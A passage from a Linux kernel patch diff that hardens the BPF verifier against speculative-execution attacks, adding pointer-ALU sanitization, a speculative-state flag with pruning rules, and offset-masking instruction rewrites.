offset as long as it doesn't overflow * the s32 'off' field */ @@ -3192,6 +3297,11 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env, } break; case BPF_SUB: + ret = sanitize_ptr_alu(env, insn, ptr_reg, dst_reg, smin_val < 0); + if (ret < 0) { + verbose(env, "R%d tried to sub from different maps or paths\n", dst); + return ret; + } if (dst_reg == off_reg) { /* scalar -= pointer. Creates an unknown scalar */ verbose(env, "R%d tried to subtract pointer from scalar\n", @@ -4389,7 +4499,8 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env, } } - other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx); + other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx, + false); if (!other_branch) return -EFAULT; other_branch_regs = other_branch->frame[other_branch->curframe]->regs; @@ -5499,6 +5610,12 @@ static bool states_equal(struct bpf_verifier_env *env, if (old->curframe != cur->curframe) return false; + /* Verification state from speculative execution simulation + * must never prune a non-speculative execution one. + */ + if (old->speculative && !cur->speculative) + return false; + /* for states to be equal callsites have to be the same * and all frame states need to be equivalent */ @@ -5700,6 +5817,7 @@ static int do_check(struct bpf_verifier_env *env) if (!state) return -ENOMEM; state->curframe = 0; + state->speculative = false; state->frame[0] = kzalloc(sizeof(struct bpf_func_state), GFP_KERNEL); if (!state->frame[0]) { kfree(state); @@ -5739,8 +5857,10 @@ static int do_check(struct bpf_verifier_env *env) /* found equivalent state, can prune the search */ if (env->log.level) { if (do_print_state) - verbose(env, "\nfrom %d to %d: safe\n", - env->prev_insn_idx, env->insn_idx); + verbose(env, "\nfrom %d to %d%s: safe\n", + env->prev_insn_idx, env->insn_idx, + env->cur_state->speculative ? + " (speculative execution)" : ""); else verbose(env, "%d: safe\n", env->insn_idx); } @@ -5757,8 +5877,10 @@ static int do_check(struct bpf_verifier_env *env) if (env->log.level > 1) verbose(env, "%d:", env->insn_idx); else - verbose(env, "\nfrom %d to %d:", - env->prev_insn_idx, env->insn_idx); + verbose(env, "\nfrom %d to %d%s:", + env->prev_insn_idx, env->insn_idx, + env->cur_state->speculative ? + " (speculative execution)" : ""); print_verifier_state(env, state->frame[state->curframe]); do_print_state = false; } @@ -6750,6 +6872,57 @@ static int fixup_bpf_calls(struct bpf_verifier_env *env) continue; } + if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) || + insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) { + const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X; + const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X; + struct bpf_insn insn_buf[16]; + struct bpf_insn *patch = &insn_buf[0]; + bool issrc, isneg; + u32 off_reg; + + aux = &env->insn_aux_data[i + delta]; + if (!aux->alu_state) + continue; + + isneg = aux->alu_state & BPF_ALU_NEG_VALUE; + issrc = (aux->alu_state & BPF_ALU_SANITIZE) == + BPF_ALU_SANITIZE_SRC; + + off_reg = issrc ? insn->src_reg : insn->dst_reg; + if (isneg) + *patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1); + *patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1); + *patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg); + *patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg); + *patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0); + *patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63); + if (issrc) { + *patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, + off_reg); + insn->src_reg = BPF_REG_AX; + } else { + *patch++ = BPF_ALU64_REG(BPF_AND, off_reg, + BPF_REG_AX); + } + if (isneg) + insn->code = insn->code == code_add ? + code_sub : code_add; + *patch++ = *insn; + if (issrc && isneg) + *patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1); + cnt = patch - insn_buf; + + new_prog = bpf_patch_insn_data(env, i + delta, insn_buf, cnt); + if (!new_prog) + return -ENOMEM; + + delta += cnt - 1; + env->prog = prog = new_prog; + insn = new_prog->insnsi + i + delta; + continue; + } + if (insn->code != (BPF_JMP | BPF_CALL)) continue; if (insn->src_reg == BPF_PSEUDO_CALL)